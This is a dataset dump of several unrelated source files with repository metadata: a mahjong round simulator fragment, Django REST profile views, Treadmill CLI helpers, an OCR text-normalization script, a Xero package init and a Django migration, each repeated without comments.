self.visibleTile[Tile.tileToValue(item.tile)] += 3
def addGang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.remove((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile),
Tile.tileToUtf(item.tile)))
return
else:
self.visibleTile[Tile.tileToValue(item.tile)] += 3
def anGang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append(
(Tile.tileToUtf('8z'), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf('8z')))
return
else:
self.visibleTile[Tile.tileToValue(item.tile)] += 4
def calculateBest(self):
a = reasoner()
choices, xh = a.discardTileList([Tile.tileToValue(i) for i in self.handtile], self.playernum)
bestChoices = []
for i in choices.keys():
tmp = 0
for j in choices[i][0]:
tmp += 4 - self.visibleTile[j]
bestChoices.append((i, tmp, choices[i][1], choices[i][0]))
bestChoices.sort(key=lambda x: x[1], reverse=True)
return xh, bestChoices
def simulateRound(self, roundData: Round):
self.initround(roundData)
print('new round!!!')
for i in roundData.itemList:
if i.op.value == 1:
self.deal(i)
if i.op.value == 2:
self.discard(i)
if i.op.value == 10:
self.babei(i)
if i.op.value == -1:
self.chi(i)
if i.op.value == -2:
self.peng(i)
if i.op.value == -3:
self.gang(i)
if i.op.value == -4:
self.addGang(i)
if i.op.value == -5:
self.anGang(i)
if i.op.value == 0 or i.op.value == -10:
self.report[0].game.append(self.game)
| true
| true
|
1c4900235bf1e0eb9fa5f69a5c4b5d09ce43d13e
| 4,554
|
py
|
Python
|
newprofiles_api/views.py
|
rayhaan12/newprofiles-rest-api
|
4bff98a815f8773e0c1a90be354d5df5b2987034
|
[
"MIT"
] | null | null | null |
newprofiles_api/views.py
|
rayhaan12/newprofiles-rest-api
|
4bff98a815f8773e0c1a90be354d5df5b2987034
|
[
"MIT"
] | null | null | null |
newprofiles_api/views.py
|
rayhaan12/newprofiles-rest-api
|
4bff98a815f8773e0c1a90be354d5df5b2987034
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
# from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.permissions import IsAuthenticated
from newprofiles_api import serializers
from newprofiles_api import models
from newprofiles_api import permissions
class HelloApiView(APIView):
"""Test API View"""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Returns a list of APIView features"""
an_apiview = [
'Uses HTTP methods as function (get, post, patch, put, delete)',
'Is similar to a traditional Django view',
'Gives you the most control over your application logic',
'Is mapped manually to URLs'
]
return Response({'message': 'Hello', 'an_apiview': an_apiview})
def post(self, request):
"""Create a hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
"""Handle updating an object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""Handle a partial update of an object"""
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
"""Delete an object"""
return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
"""Test API ViewSet"""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return a hello message"""
a_viewset = [
'Uses actions (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using Routers',
'Provides more functionality with less code',
]
return Response({'message': 'Hello!', 'a_viewset': a_viewset})
def create(self, request):
"""Create a new hello message"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
"""Handle updating an object"""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handle updating part of an object"""
return Response({'htttp_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handle removing an object"""
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
"""Handle creating and updating profiles"""
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.objects.all()
authentication_classes = (TokenAuthentication, )
permission_classes = (permissions.UpdateOwnProfile, )
filter_backends = (filters.SearchFilter, )
search_fields = ('name', 'email', )
class UserLoginApiView(ObtainAuthToken):
"""Handle creating user authentication tokens"""
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handles creating, reading, and updating profile feed items"""
authentication_classes = (TokenAuthentication, )
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (permissions.UpdateOwnStatus, IsAuthenticated)
def perform_create(self, serializer):
"""Sets the user profile to the logged in user"""
serializer.save(user_profile=self.request.user)
| 35.030769
| 76
| 0.66996
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated
from newprofiles_api import serializers
from newprofiles_api import models
from newprofiles_api import permissions
class HelloApiView(APIView):
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
an_apiview = [
'Uses HTTP methods as function (get, post, patch, put, delete)',
'Is similar to a traditional Django view',
'Gives you the most control over your application logic',
'Is mapped manually to URLs'
]
return Response({'message': 'Hello', 'an_apiview': an_apiview})
def post(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
serializer_class = serializers.HelloSerializer
def list(self, request):
a_viewset = [
'Uses actions (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using Routers',
'Provides more functionality with less code',
]
return Response({'message': 'Hello!', 'a_viewset': a_viewset})
def create(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
return Response({'htttp_method': 'PATCH'})
def destroy(self, request, pk=None):
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.objects.all()
authentication_classes = (TokenAuthentication, )
permission_classes = (permissions.UpdateOwnProfile, )
filter_backends = (filters.SearchFilter, )
search_fields = ('name', 'email', )
class UserLoginApiView(ObtainAuthToken):
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
authentication_classes = (TokenAuthentication, )
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (permissions.UpdateOwnStatus, IsAuthenticated)
def perform_create(self, serializer):
serializer.save(user_profile=self.request.user)
| true
| true
|
1c490055f5f4562ff857ac82287c7b72e90656c7
| 11,830
|
py
|
Python
|
lib/python/treadmill/cli/__init__.py
|
vrautela/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | null | null | null |
lib/python/treadmill/cli/__init__.py
|
vrautela/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | 1
|
2017-09-18T10:36:12.000Z
|
2017-09-18T10:36:12.000Z
|
lib/python/treadmill/cli/__init__.py
|
evreng/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | null | null | null |
"""Treadmill commaand line helpers.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# Disable too many lines in module warning.
#
# pylint: disable=C0302
import codecs
import copy
import functools
import io
import logging
import os
import pkgutil
import re
import sys
import traceback
import click
import six
from six.moves import configparser
import treadmill
from treadmill import restclientopts
from treadmill import plugin_manager
from treadmill import context
from treadmill import utils
from treadmill import subproc
EXIT_CODE_DEFAULT = 1
# Disable unicode_literals click warning.
click.disable_unicode_literals_warning = True
def init_logger(name):
"""Initialize logger.
"""
try:
# logging configuration files in json format
conf = treadmill.logging.load_logging_conf(name)
logging.config.dictConfig(conf)
except configparser.Error:
# TODO: Incidentally, tempfile adds 2M memory, and it is used only
# in case of exception. Need to move this elsewhere.
import tempfile
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
traceback.print_exc(file=f)
click.echo('Error parsing log conf: {name}'.format(name=name),
err=True)
def init_profile():
"""Initailize profile.
"""
if 'TREADMILL_ALIASES_PATH' in os.environ:
subproc.load_aliases(os.environ['TREADMILL_ALIASES_PATH'])
else:
packages = ['aliases']
profile = context.GLOBAL.get_profile_name()
if profile:
packages.append('aliases.{}'.format(profile))
subproc.load_packages(packages)
def make_commands(section, **click_args):
"""Make a Click multicommand from all submodules of the module."""
class MCommand(click.MultiCommand):
"""Treadmill CLI driver."""
def __init__(self, *args, **kwargs):
if kwargs and click_args:
kwargs.update(click_args)
click.MultiCommand.__init__(self, *args, **kwargs)
def list_commands(self, ctx):
"""Return list of commands in section."""
return sorted(plugin_manager.names(section))
def get_command(self, ctx, cmd_name):
"""Return dymanically constructed command."""
try:
return plugin_manager.load(section, cmd_name).init()
except ImportError as import_err:
print(
'dependency error: {}:{} - {}'.format(
section, cmd_name, str(import_err)
),
file=sys.stderr
)
except KeyError:
raise click.UsageError('Invalid command: %s' % cmd_name)
return MCommand
def _read_password(value):
"""Heuristic to either read the password from file or return the value."""
if os.path.exists(value):
with io.open(value) as f:
return f.read().strip()
else:
return value
# pylint: disable=too-many-branches
def handle_context_opt(ctx, param, value):
"""Handle eager CLI options to configure context.
The eager options are evaluated directly during parsing phase, and can
affect other options parsing (like required/not).
The only side effect of consuming these options are setting attributes
of the global context.
"""
# pylint: disable=too-many-branches
def parse_dns_server(dns_server):
"""Parse dns server string"""
if ':' in dns_server:
hosts_port = dns_server.split(':')
return (hosts_port[0].split(','), int(hosts_port[1]))
else:
return (dns_server.split(','), None)
if not value or ctx.resilient_parsing:
return None
if value == '-':
return None
opt = param.name
if opt == 'cell':
cell_parts = value.split('.')
context.GLOBAL.cell = cell_parts.pop(0)
if cell_parts:
context.GLOBAL.dns_domain = '.'.join(cell_parts)
elif opt == 'dns_domain':
context.GLOBAL.dns_domain = value
elif opt == 'dns_server':
context.GLOBAL.dns_server = parse_dns_server(value)
elif opt == 'ldap':
context.GLOBAL.ldap.url = value
elif opt == 'ldap_master':
context.GLOBAL.ldap.write_url = value
elif opt == 'ldap_suffix':
context.GLOBAL.ldap_suffix = value
elif opt == 'ldap_user':
context.GLOBAL.ldap.user = value
elif opt == 'ldap_pwd':
context.GLOBAL.ldap.password = _read_password(value)
elif opt == 'zookeeper':
context.GLOBAL.zk.url = value
elif opt == 'profile':
context.GLOBAL.set_profile_name(value)
init_profile()
elif opt == 'api_service_principal':
restclientopts.AUTH_PRINCIPAL = value
else:
raise click.UsageError('Invalid option: %s' % param.name)
return value
class _CommaSepList(click.ParamType):
"""Custom input type for comma separated values."""
name = 'list'
def convert(self, value, param, ctx):
"""Convert command line argument to list."""
if value is None:
return []
try:
return value.split(',')
except AttributeError:
self.fail('%s is not a comma separated list' % value, param, ctx)
LIST = _CommaSepList()
class Enums(click.ParamType):
"""Custom input type for comma separated enums."""
name = 'enumlist'
def __init__(self, choices):
self.choices = choices
def get_metavar(self, param):
return '[%s]' % '|'.join(self.choices)
def get_missing_message(self, param):
return 'Choose from %s.' % ', '.join(self.choices)
def convert(self, value, param, ctx):
"""Convert command line argument to list."""
if value is None:
return []
choices = []
try:
for val in value.split(','):
if val in self.choices:
choices.append(val)
else:
self.fail(
'invalid choice: %s. (choose from %s)' %
(val, ', '.join(self.choices)),
param, ctx
)
return choices
except AttributeError:
self.fail('%s is not a comma separated list' % value, param, ctx)
class _KeyValuePairs(click.ParamType):
"""Custom input type for key/value pairs."""
name = 'key/value pairs'
def convert(self, value, param, ctx):
"""Convert command line argument to list."""
if value is None:
return {}
items = re.split(r'([\w\.\-]+=)', value)
items.pop(0)
keys = [key.rstrip('=') for key in items[0::2]]
values = [value.rstrip(',') for value in items[1::2]]
return dict(zip(keys, values))
DICT = _KeyValuePairs()
def validate_memory(_ctx, _param, value):
"""Validate memory string."""
if value is None:
return None
if not re.search(r'\d+[KkMmGg]$', value):
raise click.BadParameter('Memory format: nnn[K|M|G].')
return value
def validate_disk(_ctx, _param, value):
"""Validate disk string."""
if value is None:
return None
if not re.search(r'\d+[KkMmGg]$', value):
raise click.BadParameter('Disk format: nnn[K|M|G].')
return value
def validate_cpu(_ctx, _param, value):
"""Validate cpu string."""
if value is None:
return None
if not re.search(r'\d+%$', value):
raise click.BadParameter('CPU format: nnn%.')
return value
def validate_cpuset_cores(_ctx, _param, value):
"""Validate cpuset cores string."""
if value is None:
return None
if not re.search(r'\d+\-?\d*(,\d+\-?\d*)*$', value):
raise click.BadParameter('CPU cores format: nnn[,nnn-[nnn]].')
return value
def validate_reboot_schedule(_ctx, _param, value):
"""Validate reboot schedule specification."""
if value is None:
return None
try:
utils.reboot_schedule(value)
except ValueError:
raise click.BadParameter('Invalid reboot schedule. (eg.: "sat,sun")')
return value
def combine(list_of_values, sep=','):
"""Split and sum list of sep string into one list.
"""
combined = sum(
[str(values).split(sep) for values in list(list_of_values)],
[]
)
if combined == ['-']:
combined = None
return combined
def out(string, *args):
"""Print to stdout."""
if args:
string = string % args
click.echo(string)
def handle_exceptions(exclist):
"""Decorator that will handle exceptions and output friendly messages."""
def wrap(f):
"""Returns decorator that wraps/handles exceptions."""
exclist_copy = copy.copy(exclist)
@functools.wraps(f)
def wrapped_f(*args, **kwargs):
"""Wrapped function."""
if not exclist_copy:
f(*args, **kwargs)
else:
exc, handler = exclist_copy.pop(0)
try:
wrapped_f(*args, **kwargs)
except exc as err:
if isinstance(handler, six.string_types):
click.echo(handler, err=True)
elif handler is None:
click.echo(str(err), err=True)
else:
click.echo(handler(err), err=True)
sys.exit(EXIT_CODE_DEFAULT)
@functools.wraps(f)
def _handle_any(*args, **kwargs):
"""Default exception handler."""
try:
return wrapped_f(*args, **kwargs)
except click.UsageError as usage_err:
click.echo('Usage error: %s' % str(usage_err), err=True)
sys.exit(EXIT_CODE_DEFAULT)
except Exception as unhandled: # pylint: disable=W0703
# TODO: see similar comment as to why lazy import tempfile.
import tempfile
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
traceback.print_exc(file=f)
click.echo('Error: %s [ %s ]' % (unhandled, f.name),
err=True)
sys.exit(EXIT_CODE_DEFAULT)
return _handle_any
return wrap
OUTPUT_FORMAT = None
def make_formatter(pretty_formatter):
"""Makes a formatter."""
def _format(item, how=None):
"""Formats the object given global format setting."""
if OUTPUT_FORMAT is None:
how = pretty_formatter
else:
how = OUTPUT_FORMAT
try:
fmt = plugin_manager.load('treadmill.formatters', how)
return fmt.format(item)
except KeyError:
return str(item)
return _format
def bad_exit(string, *args):
"""System exit non-zero with a string to sys.stderr.
The printing takes care of the newline"""
if args:
string = string % args
click.echo(string, err=True)
sys.exit(-1)
def echo_colour(colour, string, *args):
"""click.echo colour with support for placeholders, e.g. %s"""
if args:
string = string % args
click.echo(click.style(string, fg=colour))
def echo_green(string, *args):
"""click.echo green with support for placeholders, e.g. %s"""
echo_colour('green', string, *args)
def echo_yellow(string, *args):
"""click.echo yellow with support for placeholders, e.g. %s"""
echo_colour('yellow', string, *args)
def echo_red(string, *args):
"""click.echo yellow with support for placeholders, e.g. %s"""
echo_colour('red', string, *args)
| 27.704918
| 78
| 0.594928
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import codecs
import copy
import functools
import io
import logging
import os
import pkgutil
import re
import sys
import traceback
import click
import six
from six.moves import configparser
import treadmill
from treadmill import restclientopts
from treadmill import plugin_manager
from treadmill import context
from treadmill import utils
from treadmill import subproc
EXIT_CODE_DEFAULT = 1
click.disable_unicode_literals_warning = True
def init_logger(name):
try:
conf = treadmill.logging.load_logging_conf(name)
logging.config.dictConfig(conf)
except configparser.Error:
import tempfile
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
traceback.print_exc(file=f)
click.echo('Error parsing log conf: {name}'.format(name=name),
err=True)
def init_profile():
if 'TREADMILL_ALIASES_PATH' in os.environ:
subproc.load_aliases(os.environ['TREADMILL_ALIASES_PATH'])
else:
packages = ['aliases']
profile = context.GLOBAL.get_profile_name()
if profile:
packages.append('aliases.{}'.format(profile))
subproc.load_packages(packages)
def make_commands(section, **click_args):
class MCommand(click.MultiCommand):
def __init__(self, *args, **kwargs):
if kwargs and click_args:
kwargs.update(click_args)
click.MultiCommand.__init__(self, *args, **kwargs)
def list_commands(self, ctx):
return sorted(plugin_manager.names(section))
def get_command(self, ctx, cmd_name):
try:
return plugin_manager.load(section, cmd_name).init()
except ImportError as import_err:
print(
'dependency error: {}:{} - {}'.format(
section, cmd_name, str(import_err)
),
file=sys.stderr
)
except KeyError:
raise click.UsageError('Invalid command: %s' % cmd_name)
return MCommand
def _read_password(value):
if os.path.exists(value):
with io.open(value) as f:
return f.read().strip()
else:
return value
def handle_context_opt(ctx, param, value):
def parse_dns_server(dns_server):
if ':' in dns_server:
hosts_port = dns_server.split(':')
return (hosts_port[0].split(','), int(hosts_port[1]))
else:
return (dns_server.split(','), None)
if not value or ctx.resilient_parsing:
return None
if value == '-':
return None
opt = param.name
if opt == 'cell':
cell_parts = value.split('.')
context.GLOBAL.cell = cell_parts.pop(0)
if cell_parts:
context.GLOBAL.dns_domain = '.'.join(cell_parts)
elif opt == 'dns_domain':
context.GLOBAL.dns_domain = value
elif opt == 'dns_server':
context.GLOBAL.dns_server = parse_dns_server(value)
elif opt == 'ldap':
context.GLOBAL.ldap.url = value
elif opt == 'ldap_master':
context.GLOBAL.ldap.write_url = value
elif opt == 'ldap_suffix':
context.GLOBAL.ldap_suffix = value
elif opt == 'ldap_user':
context.GLOBAL.ldap.user = value
elif opt == 'ldap_pwd':
context.GLOBAL.ldap.password = _read_password(value)
elif opt == 'zookeeper':
context.GLOBAL.zk.url = value
elif opt == 'profile':
context.GLOBAL.set_profile_name(value)
init_profile()
elif opt == 'api_service_principal':
restclientopts.AUTH_PRINCIPAL = value
else:
raise click.UsageError('Invalid option: %s' % param.name)
return value
class _CommaSepList(click.ParamType):
name = 'list'
def convert(self, value, param, ctx):
if value is None:
return []
try:
return value.split(',')
except AttributeError:
self.fail('%s is not a comma separated list' % value, param, ctx)
LIST = _CommaSepList()
class Enums(click.ParamType):
name = 'enumlist'
def __init__(self, choices):
self.choices = choices
def get_metavar(self, param):
return '[%s]' % '|'.join(self.choices)
def get_missing_message(self, param):
return 'Choose from %s.' % ', '.join(self.choices)
def convert(self, value, param, ctx):
if value is None:
return []
choices = []
try:
for val in value.split(','):
if val in self.choices:
choices.append(val)
else:
self.fail(
'invalid choice: %s. (choose from %s)' %
(val, ', '.join(self.choices)),
param, ctx
)
return choices
except AttributeError:
self.fail('%s is not a comma separated list' % value, param, ctx)
class _KeyValuePairs(click.ParamType):
name = 'key/value pairs'
def convert(self, value, param, ctx):
if value is None:
return {}
items = re.split(r'([\w\.\-]+=)', value)
items.pop(0)
keys = [key.rstrip('=') for key in items[0::2]]
values = [value.rstrip(',') for value in items[1::2]]
return dict(zip(keys, values))
DICT = _KeyValuePairs()
def validate_memory(_ctx, _param, value):
if value is None:
return None
if not re.search(r'\d+[KkMmGg]$', value):
raise click.BadParameter('Memory format: nnn[K|M|G].')
return value
def validate_disk(_ctx, _param, value):
if value is None:
return None
if not re.search(r'\d+[KkMmGg]$', value):
raise click.BadParameter('Disk format: nnn[K|M|G].')
return value
def validate_cpu(_ctx, _param, value):
if value is None:
return None
if not re.search(r'\d+%$', value):
raise click.BadParameter('CPU format: nnn%.')
return value
def validate_cpuset_cores(_ctx, _param, value):
if value is None:
return None
if not re.search(r'\d+\-?\d*(,\d+\-?\d*)*$', value):
raise click.BadParameter('CPU cores format: nnn[,nnn-[nnn]].')
return value
def validate_reboot_schedule(_ctx, _param, value):
if value is None:
return None
try:
utils.reboot_schedule(value)
except ValueError:
raise click.BadParameter('Invalid reboot schedule. (eg.: "sat,sun")')
return value
def combine(list_of_values, sep=','):
combined = sum(
[str(values).split(sep) for values in list(list_of_values)],
[]
)
if combined == ['-']:
combined = None
return combined
def out(string, *args):
if args:
string = string % args
click.echo(string)
def handle_exceptions(exclist):
def wrap(f):
exclist_copy = copy.copy(exclist)
@functools.wraps(f)
def wrapped_f(*args, **kwargs):
if not exclist_copy:
f(*args, **kwargs)
else:
exc, handler = exclist_copy.pop(0)
try:
wrapped_f(*args, **kwargs)
except exc as err:
if isinstance(handler, six.string_types):
click.echo(handler, err=True)
elif handler is None:
click.echo(str(err), err=True)
else:
click.echo(handler(err), err=True)
sys.exit(EXIT_CODE_DEFAULT)
@functools.wraps(f)
def _handle_any(*args, **kwargs):
try:
return wrapped_f(*args, **kwargs)
except click.UsageError as usage_err:
click.echo('Usage error: %s' % str(usage_err), err=True)
sys.exit(EXIT_CODE_DEFAULT)
except Exception as unhandled: import tempfile
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
traceback.print_exc(file=f)
click.echo('Error: %s [ %s ]' % (unhandled, f.name),
err=True)
sys.exit(EXIT_CODE_DEFAULT)
return _handle_any
return wrap
OUTPUT_FORMAT = None
def make_formatter(pretty_formatter):
def _format(item, how=None):
if OUTPUT_FORMAT is None:
how = pretty_formatter
else:
how = OUTPUT_FORMAT
try:
fmt = plugin_manager.load('treadmill.formatters', how)
return fmt.format(item)
except KeyError:
return str(item)
return _format
def bad_exit(string, *args):
if args:
string = string % args
click.echo(string, err=True)
sys.exit(-1)
def echo_colour(colour, string, *args):
if args:
string = string % args
click.echo(click.style(string, fg=colour))
def echo_green(string, *args):
echo_colour('green', string, *args)
def echo_yellow(string, *args):
echo_colour('yellow', string, *args)
def echo_red(string, *args):
echo_colour('red', string, *args)
| true
| true
|
1c49017bb9ee1597a023b8f28ea2fa9d21d3b4ee
| 1,468
|
py
|
Python
|
ocropy/normalize.py
|
GuillaumeDesforges/ocr-enpc
|
2d92561ce8f239bcbc90dd666e3e5711e311da01
|
[
"MIT"
] | 1
|
2018-05-03T13:40:42.000Z
|
2018-05-03T13:40:42.000Z
|
ocropy/normalize.py
|
GuillaumeDesforges/ocr-enpc
|
2d92561ce8f239bcbc90dd666e3e5711e311da01
|
[
"MIT"
] | null | null | null |
ocropy/normalize.py
|
GuillaumeDesforges/ocr-enpc
|
2d92561ce8f239bcbc90dd666e3e5711e311da01
|
[
"MIT"
] | null | null | null |
# coding: unicode
import os
import codecs
import unicodedata
print("Script deprecated : path was hard set in the script, change it or do not use this script")
path = "C:\\Users\\teovi\\Documents\\ocropy\\book"
os.chdir(path)
compteur=0
strchar=""
for folder in os.listdir(path):
for file in os.listdir(path+"\\"+folder):
if "gt" in file:
# print(folder+"\\"+file)
f = codecs.open(folder+"\\"+file, 'r', encoding='utf-8')
for line in f:
newline = ""
for char in line:
if char not in strchar:
strchar+=char
if char == "ſ":
newline+="Z"
else:
newline+=char
newline=unicodedata.normalize('NFKC',newline)
f.close()
# f = codecs.open(folder+"\\"+file, 'w', encoding='utf-8')
# f.write(newline)
# f.close()
strchar = ''.join(sorted(strchar))
print(strchar)
# '-./9ABCDFGJKLMNOPQRSTabcefghklmnopqrstuvwxyzãõ÷ıũɑ́̃͛ͣͤͥͦδ᷑ẽꝑꝓꝛꝯ]
# '-./9ABCDFGJKLMNOPQRSTabcefghklmnopqrstuvwxyzãõ÷ıũɑ́̃͛ͣͤͥͦδ᷑ẽ⁹ꝑꝓꝛꝯ\ue476\uf217"
normstrchar1 = unicodedata.normalize('NFKC', strchar)
normstrchar1 = ''.join(sorted(normstrchar))
print(normstrchar1)
normstrchar2 = unicodedata.normalize('NFC', strchar)
normstrchar2 = ''.join(sorted(normstrchar))
print(normstrchar2)
| 28.230769
| 97
| 0.557221
|
import os
import codecs
import unicodedata
print("Script deprecated : path was hard set in the script, change it or do not use this script")
path = "C:\\Users\\teovi\\Documents\\ocropy\\book"
os.chdir(path)
compteur=0
strchar=""
for folder in os.listdir(path):
for file in os.listdir(path+"\\"+folder):
if "gt" in file:
f = codecs.open(folder+"\\"+file, 'r', encoding='utf-8')
for line in f:
newline = ""
for char in line:
if char not in strchar:
strchar+=char
if char == "ſ":
newline+="Z"
else:
newline+=char
newline=unicodedata.normalize('NFKC',newline)
f.close()
strchar = ''.join(sorted(strchar))
print(strchar)
# '-./9ABCDFGJKLMNOPQRSTabcefghklmnopqrstuvwxyzãõ÷ıũɑ́̃͛ͣͤͥͦδ᷑ẽ⁹ꝑꝓꝛꝯ\ue476\uf217"
normstrchar1 = unicodedata.normalize('NFKC', strchar)
normstrchar1 = ''.join(sorted(normstrchar))
print(normstrchar1)
normstrchar2 = unicodedata.normalize('NFC', strchar)
normstrchar2 = ''.join(sorted(normstrchar))
print(normstrchar2)
| true
| true
|
1c490274108d5768a6bcbaabd2f373b211f3f15d
| 101
|
py
|
Python
|
venv/Lib/site-packages/xero_python/assets/api/__init__.py
|
RobMilinski/Xero-Starter-Branched-Test
|
c82382e674b34c2336ee164f5a079d6becd1ed46
|
[
"MIT"
] | 77
|
2020-02-16T03:50:18.000Z
|
2022-03-11T03:53:26.000Z
|
venv/Lib/site-packages/xero_python/assets/api/__init__.py
|
RobMilinski/Xero-Starter-Branched-Test
|
c82382e674b34c2336ee164f5a079d6becd1ed46
|
[
"MIT"
] | 50
|
2020-04-06T10:15:52.000Z
|
2022-03-29T21:27:50.000Z
|
venv/Lib/site-packages/xero_python/assets/api/__init__.py
|
RobMilinski/Xero-Starter-Branched-Test
|
c82382e674b34c2336ee164f5a079d6becd1ed46
|
[
"MIT"
] | 27
|
2020-06-04T11:16:17.000Z
|
2022-03-19T06:27:36.000Z
|
# flake8: noqa
# import apis into api package
from xero_python.assets.api.asset_api import AssetApi
| 20.2
| 53
| 0.80198
|
from xero_python.assets.api.asset_api import AssetApi
| true
| true
|
1c49033f05e9e0790baf8ce9b9950502c82c3278
| 606
|
py
|
Python
|
opconsole/migrations/0023_auto_20170502_2024.py
|
baalkor/timetracking
|
35a1650ceffa55e0ff7ef73b63e5f3457dc07612
|
[
"Apache-2.0"
] | 1
|
2017-06-05T10:52:13.000Z
|
2017-06-05T10:52:13.000Z
|
opconsole/migrations/0023_auto_20170502_2024.py
|
baalkor/timetracking
|
35a1650ceffa55e0ff7ef73b63e5f3457dc07612
|
[
"Apache-2.0"
] | 2
|
2017-05-10T20:47:33.000Z
|
2017-05-10T20:49:24.000Z
|
opconsole/migrations/0023_auto_20170502_2024.py
|
baalkor/timetracking
|
35a1650ceffa55e0ff7ef73b63e5f3457dc07612
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-05-03 02:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('opconsole', '0022_auto_20170502_0758'),
]
operations = [
migrations.AddField(
model_name='employes',
name='enable',
field=models.BooleanField(default=True),
),
migrations.AlterField(
model_name='device',
name='salt',
field=models.CharField(max_length=14),
),
]
| 23.307692
| 52
| 0.590759
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('opconsole', '0022_auto_20170502_0758'),
]
operations = [
migrations.AddField(
model_name='employes',
name='enable',
field=models.BooleanField(default=True),
),
migrations.AlterField(
model_name='device',
name='salt',
field=models.CharField(max_length=14),
),
]
| true
| true
|
1c49037ff6e473a89af4860bbc9a341ab81fa67b
| 2,881
|
py
|
Python
|
galileo/framework/pytorch/python/unsupervised.py
|
YaoPu2021/galileo
|
0ebee2052bf78205f93f8cbbe0e2884095dd7af7
|
[
"Apache-2.0"
] | 115
|
2021-09-09T03:01:58.000Z
|
2022-03-30T10:46:26.000Z
|
galileo/framework/pytorch/python/unsupervised.py
|
Hacky-DH/galileo
|
e4d5021f0287dc879730dfa287b9a056f152f712
|
[
"Apache-2.0"
] | 1
|
2021-12-09T07:34:41.000Z
|
